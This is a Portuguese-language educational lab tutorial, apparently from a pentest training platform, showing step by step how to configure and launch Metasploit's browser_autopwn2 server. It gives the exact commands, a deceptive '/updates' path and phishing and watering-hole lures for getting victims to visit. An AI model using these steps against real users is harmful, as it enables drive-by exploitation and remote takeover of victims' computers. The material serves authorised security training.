Introdução
Neste laboratório, você explorará um dos recursos poderosos do Metasploit Framework: o ataque browser autopwn. Este tipo de ataque envolve a configuração de um servidor web malicioso que, ao ser visitado por um alvo, detecta automaticamente o tipo e a versão do navegador da vítima e, em seguida, serve um exploit adaptado a quaisquer vulnerabilidades descobertas.
Usaremos o módulo auxiliary/server/browser_autopwn2, uma versão atualizada e mais confiável do browser autopwn original. Este laboratório irá guiá-lo através do processo de seleção do módulo, configuração das opções necessárias e lançamento do servidor.
Aviso Legal: Este laboratório é apenas para fins educacionais. As técnicas descritas só devem ser realizadas em sistemas que você possui ou para os quais tem permissão explícita para testar.
Selecionar o módulo auxiliary/server/browser_autopwn2
Nesta etapa, você iniciará o console do Metasploit Framework e selecionará o módulo browser_autopwn2, que será o núcleo da configuração do nosso ataque.
Primeiro, abra um terminal e inicie o console do Metasploit. Usaremos a flag -q para uma inicialização "silenciosa" (quiet), que suprime o banner para uma interface mais limpa.
msfconsole -q
Assim que o console for carregado, você verá o prompt do Metasploit, que se parece com msf6 >. O Metasploit organiza suas ferramentas em módulos. Para configurar nosso ataque, precisamos usar o módulo auxiliar browser_autopwn2. Use o comando use para selecioná-lo.
use auxiliary/server/browser_autopwn2
Após executar o comando, seu prompt mudará para indicar que você está agora no contexto deste módulo específico.
msf6 > use auxiliary/server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) >
Você está agora pronto para configurar as opções do módulo.
Definir a opção LHOST para o seu IP do Kali
Nesta etapa, você configurará a opção LHOST. LHOST significa "Local Host" (Host Local) e deve ser definido para o endereço IP da sua máquina atacante (a VM LabEx). Quando um exploit for bem-sucedido, a máquina da vítima se conectará de volta a este endereço IP, dando-lhe o controle.
Primeiro, você precisa encontrar o endereço IP da sua VM LabEx. Você pode abrir uma nova aba de terminal clicando no ícone + na janela do terminal. No novo terminal, execute o seguinte comando para exibir seu endereço IP:
ip addr show eth0 | grep "inet " | awk '{print $2}' | cut -d/ -f1
Você verá uma saída semelhante a esta. Certifique-se de copiar o seu endereço IP específico.
10.0.2.15
Agora, volte ao seu terminal original onde o msfconsole está em execução. Para ver todas as opções configuráveis para o módulo browser_autopwn2, use o comando show options.
show options
Você verá uma lista de opções. Observe que LHOST é obrigatório, mas ainda não está definido. Use o comando set para configurar LHOST com o endereço IP que você acabou de copiar. Substitua YOUR_IP_ADDRESS pelo seu IP real.
set LHOST YOUR_IP_ADDRESS
Por exemplo, se o seu IP fosse 10.0.2.15, o comando seria:
set LHOST 10.0.2.15
O Metasploit confirmará a alteração.
LHOST => 10.0.2.15
O LHOST está agora corretamente configurado.
Definir o URIPATH para o servidor malicioso
Nesta etapa, você definirá o URIPATH. Esta opção define o caminho específico no seu servidor web que a vítima deve visitar para acionar o ataque. Usar um caminho discreto e não padrão pode tornar o ataque menos óbvio.
Assim como na etapa anterior, você pode usar show options para revisar as configurações atuais. Você verá que URIPATH tem um valor padrão, mas o alteraremos para algo personalizado.
Vamos definir o caminho para /updates. Isso pode enganar um usuário a pensar que está visitando uma página de atualização de software. Use o comando set para alterar o URIPATH.
set URIPATH /updates
O console confirmará que o URIPATH foi atualizado.
URIPATH => /updates
Agora, o URL malicioso que uma vítima precisaria visitar será http://<YOUR_IP_ADDRESS>:8080/updates.
Executar o módulo para iniciar o servidor web
Nesta etapa, com todas as opções necessárias configuradas, você iniciará o módulo auxiliar. Isso iniciará um servidor web na sua máquina que escuta por conexões de entrada de potenciais vítimas.
Para iniciar o módulo, basta digitar run no prompt do msfconsole e pressionar Enter.
run
O Metasploit agora iniciará o servidor e carregará todos os exploits de navegador relevantes. Você verá muita saída enquanto o servidor é inicializado. A informação chave a procurar é a confirmação de que o servidor foi iniciado e a URL que ele está usando.
A saída será algo como isto (alguns detalhes podem variar):
[*] Auxiliary module running as a background job 0.
[*] Using URL: http://10.0.2.15:8080/updates
[*] Server started.
[*] Starting the payload handler...
[*] Analyzing browser info and matching exploits...
[*] Added exploit/windows/browser/adobe_flash_avm2...
[*] Added exploit/windows/browser/adobe_flash_copy_pixels...
... (muitos outros exploits serão listados) ...
Seu servidor malicioso está agora em execução e aguardando ativamente que um navegador web se conecte a http://10.0.2.15:8080/updates (com seu IP real). Quando um navegador se conectar, o servidor o analisará e tentará lançar um exploit adequado.
Discutir como atrair um alvo para o URL malicioso
Nesta etapa final, discutiremos a parte mais crítica deste ataque: fazer com que um alvo visite o URL malicioso. O servidor está em execução, mas é passivo; ele não pode fazer nada até que uma vítima navegue até o link. Esta fase depende fortemente de engenharia social.
Como este ambiente de laboratório não inclui uma "máquina de vítima" separada, esta etapa é puramente conceitual. Não há comandos para executar.
Aqui estão alguns métodos comuns usados para entregar o link malicioso (http://YOUR_IP_ADDRESS:8080/updates) a um alvo:
- E-mails de Phishing: Enviar um e-mail enganoso que incentiva o usuário a clicar no link. Por exemplo, o e-mail pode fingir ser um alerta de segurança, uma oferta especial ou uma notificação de redefinição de senha.
- Mensagens Instantâneas: Enviar o link diretamente a um alvo através de um aplicativo de chat, muitas vezes com uma mensagem como "Ei, confira este site legal!"
- Mídias Sociais: Postar o link em uma plataforma de mídia social, seja publicamente ou em uma mensagem direta, para incentivar cliques.
- Ataque de "Watering Hole": Uma técnica mais avançada onde um atacante compromete um site legítimo que o alvo é conhecido por frequentar. O atacante então incorpora o link malicioso ou um redirecionamento nesse site.
Se um alvo com um navegador vulnerável visitar seu URL, o browser_autopwn2 servirá automaticamente o exploit apropriado. Se o exploit for bem-sucedido, uma "sessão" será aberta no seu console Metasploit, dando-lhe acesso remoto à máquina da vítima. Você verá uma mensagem como [*] Session 1 opened... no seu terminal.
Resumo
Parabéns por completar este laboratório! Você aprendeu com sucesso os passos fundamentais para configurar um ataque de browser autopwn usando o Metasploit Framework.
Neste laboratório, você:
- Iniciou o console Metasploit.
- Selecionou o módulo
auxiliary/server/browser_autopwn2. - Configurou as opções essenciais
LHOSTeURIPATH. - Iniciou o servidor web malicioso e compreendeu sua função.
- Discutiu as técnicas de engenharia social necessárias para atrair um alvo para o URL malicioso.
Este exercício demonstra o quão poderosas e automatizadas podem ser as ferramentas de teste de penetração. Ele também destaca a importância crítica de manter navegadores web e seus plugins atualizados para se defender contra tais ataques. Lembre-se sempre de usar este conhecimento de forma responsável e ética.


